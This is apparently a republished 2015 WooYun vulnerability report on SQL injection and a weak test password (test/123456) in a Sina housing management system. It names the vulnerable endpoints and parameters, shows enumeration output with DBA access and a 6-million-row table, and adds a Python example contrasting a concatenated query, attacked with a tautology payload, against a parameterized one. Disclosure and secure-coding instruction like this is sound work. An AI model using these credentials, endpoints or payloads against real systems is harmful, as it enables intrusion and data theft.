WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online ------------------------- http://drop.zone.ci/
2015-08-20: Details reported to the vendor, awaiting vendor handling
2015-08-21: Vendor confirmed; details disclosed to the vendor only
2015-08-31: Details disclosed to core white hats and domain experts
2015-09-10: Details disclosed to regular white hats
2015-09-20: Details disclosed to intern white hats
2015-10-05: Details disclosed to the public
SQL Injection
Sina second-hand housing operations management system: http://opt.op.esf.sina.com.cn/
First, a weak password:
Account: test  Password: 123456
Once logged in it is only a test account and looks useless at first:
On closer inspection, the application is full of injection points. A few are listed here; the vendor should check the rest themselves:
Endpoint: http://opt.op.esf.sina.com.cn/hotdot/findcode  Parameter: phone
Endpoint: http://opt.op.esf.sina.com.cn/company/all  Parameter: all parameters
Endpoint: http://opt.op.esf.sina.com.cn/company/communityall  Parameter: all parameters
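To make the defect behind the `findcode`/`phone` finding concrete, here is an added example (not the site's own code) of a lookup that builds the query by string concatenation next to a hardened version that validates the parameter and binds it. The `verify_code` table, its rows and the 11-digit phone format are constructed assumptions; SQLite stands in for the MySQL backend.

```python
"""Vulnerable vs. hardened 'findcode'-style lookup (added example, not Sina's code)."""
import re
import sqlite3

# Constructed sample rows standing in for the real backend table (assumption).
SAMPLE_ROWS = [
    ("13800000001", "CODE-A"),
    ("13800000002", "CODE-B"),
    ("13800000003", "CODE-C"),
]


def make_db():
    """In-memory SQLite database with the constructed verify_code table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE verify_code (phone TEXT, code TEXT)")
    conn.executemany("INSERT INTO verify_code VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def findcode_vulnerable(conn, phone):
    """The defect the report describes: the parameter becomes part of the SQL text."""
    sql = "SELECT code FROM verify_code WHERE phone = '" + phone + "'"
    return [row[0] for row in conn.execute(sql)]


# Assumption: the endpoint expects an 11-digit mainland China mobile number.
PHONE_RE = re.compile(r"^\d{11}$")


def findcode_hardened(conn, phone):
    """Allowlist-validate the input, then bind it so it cannot change query structure."""
    if not PHONE_RE.match(phone):
        raise ValueError("phone must be exactly 11 digits")
    sql = "SELECT code FROM verify_code WHERE phone = ?"
    return [row[0] for row in conn.execute(sql, (phone,))]


def demo():
    """Returns (rows leaked by the vulnerable lookup, whether the hardened one
    rejected the same input, result of a legitimate hardened lookup)."""
    conn = make_db()
    tautology = "x' OR '1'='1"          # turns the WHERE clause into an always-true test
    leaked = findcode_vulnerable(conn, tautology)
    try:
        findcode_hardened(conn, tautology)
        rejected = False
    except ValueError:
        rejected = True
    return len(leaked), rejected, findcode_hardened(conn, "13800000002")
```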
147 databases:
web application technology: Apache 2, PHP 5.2.14
back-end DBMS: MySQL 5.0.12
available databases [147]:
DBA privileges:
web application technology: Apache 2, PHP 5.2.14
back-end DBMS: MySQL 5.0.12
current user is DBA: True
database management system users password hashes:
Picked an arbitrary database and enumerated its tables:
Database: mobile_esf_leju_com
[197 tables]
Picked an arbitrary table and counted its rows: over 6 million (apparently Shenzhen housing listings):
Database: house_refresh_sz
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| sp_house_refresh | 6141012 |
+------------------+---------+
The test stopped here; no data was downloaded.
You are the professionals.
Severity: Low
Vulnerability Rank: 5
Confirmed at: 2015-08-21 09:21
Thank you for your support; it has been forwarded to our partner for handling.
None yet